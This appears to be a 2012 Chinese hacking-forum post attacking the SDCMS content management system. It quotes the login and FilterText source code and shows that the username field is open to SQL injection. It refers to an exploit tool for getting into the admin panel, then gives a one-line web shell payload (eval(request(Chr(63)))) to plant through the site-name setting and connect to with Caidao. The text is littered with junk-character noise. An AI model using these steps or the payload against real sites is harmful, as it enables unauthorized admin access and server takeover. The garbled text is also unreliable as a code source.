作者:T00LS 鬼哥. }+ c# J- S& B. t8 {
漏洞文件:后台目录/index.asp1 p9 w2 @8 i8 |* B9 \0 y
) b5 ]/ J, n9 {) }" Q
Sub Check
4 i! B$ {9 \* F# n/ d; Q Dim username,password,code,getcode,Rs. y0 T4 u' Y6 N' c
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
( G! t! G6 d. k2 Y5 K+ ]5 \( w username=FilterText(Trim(Request.Form("username")),1)
. ~5 J0 x0 h7 l password=FilterText(Trim(Request.Form("password")),1)6 J; _6 o3 s8 X( f9 \# M# g% l% \6 B
code=Trim(Request.Form("yzm"))% @& H% j! q u6 l0 g
getcode=Session("SDCMSCode")$ T$ F1 i8 _/ C7 x6 I$ r
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
' [& A, S7 |4 n* T. b6 Q" x' e# m IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied' ~ ^' S. I% E
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied; ~7 H6 v7 \7 n- v' t; P
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied1 V: g+ ?8 Y" K
IF username="" or password="" Then+ B# I/ X6 |3 Z, E- c; {! F/ [
Echo "用户名或密码不能为空"ied! [8 {* w3 l' n8 H8 c
Else+ }2 d, U% }" w. E j% L, U( T( j
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
; m5 o" X9 z$ H( v IF Rs.Eof Then; D. j3 L0 U r" S
AddLog username,GetIp,"登录失败",1; x4 \& S: u8 G
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"; j$ @, E9 c5 {2 j
Else" ~- Z+ }8 j4 h& r" d
Add_Cookies "sdcms_id",Rs(0)
# a9 z# f f k Add_Cookies "sdcms_name",username( {' F3 D( u% D4 g
Add_Cookies "sdcms_pwd",Rs(2)
! S! t( c4 l3 W5 s0 r Add_Cookies "sdcms_admin",Rs(3)
9 q, I4 O6 W6 u* r1 C Add_Cookies "sdcms_alllever",Rs(4)0 E3 J0 { w4 h8 T8 J( k
Add_Cookies "sdcms_infolever",Rs(5)0 o, J) I0 R! l
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")$ Z+ R* z) p6 A1 y9 Q5 l
AddLog username,GetIp,"登录成功",1
& O( Z! N" z& n; |, s '自动删除30天前的Log记录 Q' e" }) o( O; V& C0 ^
IF Sdcms_DataType Then
* M9 Y: S% e# d0 C Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
) w- F3 _9 y5 y E( D6 X# x Else9 D8 R! X2 B" k& ?4 B6 b" \
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
+ \0 t o; a* X) M End IF
: x! W. G6 }" v; ^ Go("sdcms_index.asp")2 q7 J' [- C' |6 g9 f
End IF
5 F4 e e. [" J* _. R" ^. } Rs.Close0 D% O X5 H. j* E! W* k
Set Rs=Nothing6 `7 Y3 E/ G; I% @' ?" y) B
End IF" g! v6 b3 R) u6 F6 S, z
End Sub
6 s, q- H) @+ a9 ]+ q- {$ }) [& R+ ~% z% g
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
& D ~% [5 _# E4 s8 C6 @% ]2 h& H
1 ]0 P: U0 a4 ~7 u N% PFunction FilterText(ByVal t0,ByVal t1)/ ^5 w5 w& V% @1 [# n8 P" J
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
/ x$ T5 K: `: _% n1 Q t0=Trim(t0)
# c8 C- f) q G! `) l- d Select Case t1
5 m! H2 u. E& n- _ Case "1"
( n) g, ]7 p3 \4 u" L6 ~ t0=Replace(t0,Chr(32),"")
/ A6 \. c; Z/ P& i5 O# W* M t0=Replace(t0,Chr(13),"")9 o1 h8 r+ ]: b
t0=Replace(t0,Chr(10)&Chr(10),""). Y+ P/ x+ g( \4 [$ ] v" t7 [
t0=Replace(t0,Chr(10),"")
4 p/ e `( R9 \9 {* P; Q Case "2"6 [. Q7 D7 I, }6 X0 L2 {/ k; D& D
t0=Replace(t0,Chr(8),"")'回格* \; P# ]% G* x8 N: k( `
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
% J( B/ I. T; G& ~- U# O t0=Replace(t0,Chr(10),"")'换行' R% `- ^6 [: _$ E3 I6 v( @- U
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)/ e3 ]; u: G8 e
t0=Replace(t0,Chr(12),"")'换页
/ E7 p8 _, p: ]; _4 X: G t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合& y% M% M8 g1 S5 V- E
t0=Replace(t0,Chr(22),"")
- I _. y {9 \* a5 Q+ J t0=Replace(t0,Chr(32),"")'空格 SPACE
: x) l4 ]% G0 K& @/ ^ t0=Replace(t0,Chr(33),"")'!
' [! B# {& h1 Z% L, e t0=Replace(t0,Chr(34),"")'"
: ]4 A `& m. p) F+ ? t0=Replace(t0,Chr(35),"")'#3 O% ]7 B3 m1 U/ U( \
t0=Replace(t0,Chr(36),"")'$
, R4 ?5 X* I) O% Y! X t0=Replace(t0,Chr(37),"")'%! h- g3 U' h0 _! t# d
t0=Replace(t0,Chr(38),"")'&
! R" C) Y9 i4 {, ]% d. d+ \3 k$ T6 I t0=Replace(t0,Chr(39),"")'': n5 N$ v, b3 C
t0=Replace(t0,Chr(40),"")'(* C! _5 h& T1 W2 g. [
t0=Replace(t0,Chr(41),"")')
) g5 i! F+ p u! y7 ]8 m0 p4 k t0=Replace(t0,Chr(42),"")'*2 r( [- ]! c! t, O+ F+ z
t0=Replace(t0,Chr(43),"")'+: K! n% d F, B' q
t0=Replace(t0,Chr(44),"")',! K+ Y! d; J' N) K
t0=Replace(t0,Chr(45),"")'-/ D1 J+ p" \) i n2 M1 }
t0=Replace(t0,Chr(46),"")'.) {; R' m- J0 M5 ?
t0=Replace(t0,Chr(47),"")'/
`. T4 S m3 y. a( _ t0=Replace(t0,Chr(58),"")':
: m4 [: E# l2 t+ A' ?, Y1 ]0 ], M t0=Replace(t0,Chr(59),"")';3 \% j5 J. k0 D O; U
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
6 k H- L! p, L) o- Y# U4 y t0=Replace(t0,Chr(63),"")'?# T/ ~( N9 V% S8 w- Q
t0=Replace(t0,Chr(64),"")'@9 g2 I$ g" H$ C0 b( p. {3 g
t0=Replace(t0,Chr(91),"")'\- T0 g0 m4 }8 W9 y# @4 g3 [% S
t0=Replace(t0,Chr(92),"")'\" `; y! q2 m$ H) Y! K
t0=Replace(t0,Chr(93),"")']
9 v1 l9 _6 K1 Q; _- K; A; U) ? t0=Replace(t0,Chr(94),"")'^
$ N$ @) ~' q8 v7 e$ [ t0=Replace(t0,Chr(95),"")'_
' s; \ i7 Z" U d$ L4 m t0=Replace(t0,Chr(96),"")'`
0 {( s. A7 Y9 `+ p' S t0=Replace(t0,Chr(123),"")'{: d" g/ N3 p' g( w: {6 T
t0=Replace(t0,Chr(124),"")'|' ~! j& g5 c* @. _+ @/ p
t0=Replace(t0,Chr(125),"")'}
) q& a, O9 J/ B9 W. _+ T t0=Replace(t0,Chr(126),"")'~
! V- c9 ^6 i' f& H5 x: n& G Case Else
5 ^& u7 `; u' J7 G t0=Replace(t0, "&", "&")
# Z+ h8 X7 e' r5 O7 M, P+ A& I t0=Replace(t0, "'", "'")- [. e5 {# y5 B+ o v
t0=Replace(t0, """", """)
5 H4 B' N$ R4 e, D' e3 ]. p4 V t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
?" ~( S3 G' T& L' ` End Select4 Y. R+ f0 b7 l" E' @7 W
IF Instr(Lcase(t0),"expression")>0 Then
/ U& R; j% L& d t0=Replace(t0,"expression","e­xpression", 1, -1, 0)# J$ X( u1 z' m7 f8 b
End If; t* a: }' [0 J. H) ?9 B6 R0 E
FilterText=t0' [+ ~7 X) }0 I9 W& n, A
End Function% A' ~# }% D/ n. d
5 G% t0 k1 R( v看到没。直接参数是1 只过滤, d3 x2 K( o$ v* f. o1 W
t0=Replace(t0,Chr(32)," ")! R( } q- w, ?8 X: S8 L
t0=Replace(t0,Chr(13),"")
) F1 P0 h. S; R- z$ m7 G# Z t0=Replace(t0,Chr(10)&Chr(10),"
6 n! ?( F- g+ z! ~")
9 f8 I( Z0 y8 }* I t0=Replace(t0,Chr(10)," l% |5 `! N/ E3 P% u# q, o
")
6 M' n& u. ]2 y8 o' N% Y漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
# m& }1 n e* w; c6 Q) R! W! _EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP' g; T, U5 p) ~
1 n! R. E1 z1 H$ R; ~8 O6 A/ i( j测试:& \4 H' Z( f, W. F2 _0 }: V
7 ]* }& ?; S' k( }' q
2 X7 D! W& m9 k7 D w现在输入工具上验证码,然后点OK! V) n% g: ?. ~+ ~" [' z
! ^" E- D! q7 S# k/ N
3 B- a: B. W# S7 d看到我们直接进入后台管理界面了,呵呵!
, O! f- u) e S' f3 `% \+ j
. ]0 H7 j4 m8 Y1 {% j+ C$ @8 ^9 C: a6 s! H0 _. h' w
3 H% S+ y( o* a; ?7 G! F2 l! u这样直接进入后台了。。。。, B8 ] g: n( i- R$ a* K
9 }, J9 [0 \6 x, J; U6 J& y' g 7 j: F# p* F0 L! H6 [. }4 {
( L6 R8 P& p! t' t6 E$ N3 FSDCMS提权:
j+ V+ a. B2 Z, e0 x+ i
1 [; G: K$ j) `, w% O5 k/ U方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?0 }+ i2 W, O' f" @5 b8 ]9 ?
9 a- z# [ ]5 F: V
$ H4 l5 |% c- S5 b& K! \9 X3 G! Q& g- x5 }; k A
OK,现在用菜刀连接下!
8 U4 o; C `! ~) K
9 ]$ F& t6 r5 n( J: S
& c( B8 g" g- u6 z2 q) r1 Z! `8 T$ e) w. v
- o$ p4 q: L+ l5 h5 Z$ ] G! L. Z, Q% w+ H3 r" L1 A7 D& p1 b
|
发表于 2012-11-9 20:57:02
收藏
支持
反对